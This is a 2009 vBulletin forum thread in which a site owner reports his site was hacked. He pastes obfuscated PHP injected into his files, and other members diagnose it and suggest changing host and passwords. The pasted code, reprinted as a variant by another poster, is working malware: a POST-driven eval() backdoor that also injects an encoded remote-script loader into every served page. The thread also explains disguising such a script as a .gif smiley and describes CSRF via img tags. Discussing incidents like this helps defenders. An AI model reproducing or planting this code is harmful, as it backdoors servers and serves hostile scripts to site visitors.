HACKED - Make sure you are secure

[StructuralNet]

Okay guys, I was out to dinner before and came back and loaded my site, http://www.theangryforum.com to see a PHP error syntax on line 1...

I open up my index file and find this:

Code:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN1VXY24wY3JHU1ppcHQlMjBGbjdzcmloTGMlM0QlMkYlMkY3VVc5NCUyRTI0MkVpN29MRCUyRTIlMkVRTTMxbjBjOTUlMkZqb0xEcVFNM3VlN1VXcjdVV3lvN0QlMkVqc0ZuNyUzRUdTWiUzQ2loTCUyRlFNM3NjbjBjcjJFaWlwdCUzRScpLnJlcGxhY2UoL283RHxHU1p8aWhMfDdVV3xvTER8Rm43fG4wY3xRTTN8MkVpL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

This was dumped on a crap load of my files. The file structure was not 777 for these files either, and I do not know how this was injected in. My database was not touched, but I had to delete the installation of VB and install a fresh install and connect to the database.

I did some research on this, and results are slim but its attacking programs as well. Oscommerce for example:

http://forums.oscommerce.com/lofiver...p?t321418.html

Anyone see this before?

I was more in panic to get my site up, now that I DO have a copy of all of my files and backups, if this hits again I will investigate the source further, possibly copy the whole structure and send it to VB or what ever can be done.

[Dismounted]

Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

[StructuralNet]

Quote:

Originally Posted by Dismounted

Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

I am contacting my host right now, I am on a VPS and I have been checking the server logs for anything weird, but I think my admin is better to find something if there is something..

I would of thought, though, if they got into the server through a backdoor or something, they would of effected my other accounts. I have VB running on another account for another site, and a few other accounts with various programs that were not touch (and have been on there for a very long time)

Here is the list of my mods,

I have ibProArcade v.2.6.8 which this file structure was changed I noticed.

Here is a list of my other mods:

Admin Log In As User

Cyb - Advanced Permissions Based on Post Account

Fake User (adds a couple guests)

GTSmilieBox

Panic Button

Plus Mood

vB Ad Management

vBadvanced CMPS

vbSEO Site Map

Welcome Headers

--------------- Added [DATE]1238915113[/DATE] at [TIME]1238915113[/TIME] ---------------

Maybe someone can chime in?

This guy is getting FTP access, I have formatted all my pcs to make sure I don't have a virus, and my host is looking through everything as well.

Thing that throw my interest:


Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c


Why the arcade first? Compromised maybe? I deleted the folder when I did a backup, I also disabled my FTP server...

[TECK]

It is related to your server administration, you did not do anything wrong neither your products...
In short, it is a base64-encoded fake yahoo counter script that is injected into HTML code. The script looks for files into server’s temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell into your insecure server.
Personally, I would change host. It is obvious they don't care about security.

[StructuralNet]

Quote:

Originally Posted by TECK

It is related to your server administration, you did not do anything wrong neither your products...
In short, it is a base64-encoded fake yahoo counter script that is injected into HTML code. The script looks for files into server?s temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell into your insecure server.
Personally, I would change host. It is obvious they don't care about security.

Yea, I agree with you - because I have been going crazy formatting my machines to make sure I had no key loggers on it, etc.

The host has been working around the clock to find the security hole and try to fix it, so I am going to give him a few days to see if he can close up the hole, if not I am off. I can't have this jeopardize not only my websites on the server, but my clients that I host as well.

Considering it is a VPS, I have multiple accounts on there including another site for VB.. why is this guy going on after this site?

[TECK]

The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:

PHP Code:

<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as smilies, that look like broken images when viewed (php script executing).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all files needed to inject into each page on your site the above code. As I said before, change the host. Is not your fault or vBulletin developers if your host runs unsecured boxes.

[StructuralNet]

Quote:

Originally Posted by TECK

The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:

PHP Code:

<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as smilies, that look like broken images when viewed (php script executing).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all files needed to inject into each page on your site the above code. As I said before, change the host. Is not your fault or vBulletin developers if your host runs unsecured boxes.

Yea,

I agree - I took your advice and moved - I can't let this sit over my head :erm:

[BSMedia]

If your on a VPS chances are good, security and management relys on you or your server admin.

Your server security is only as secure as your least secure admin/server manager.

[mykes]

Unfortunately, I don't see how a vb3 site (or many others) can be truly secure at this point.

All a hacker really needs to do is post something like "hey, look at this really awesome thing" with a link to his own server where he controls the HTML and javascripts.

In his HTML there, all he needs is an img tag with src= any url at your vb3 site and he accesses that URL logged in as the unsuspecting user. Stupid browsers send cookies to your site on an img request.

img isn't the only tag, either, script tags work, too, as do css (link) tags, and a few others.

[Dismounted]

That's why vBulletin introduced CSRF protection.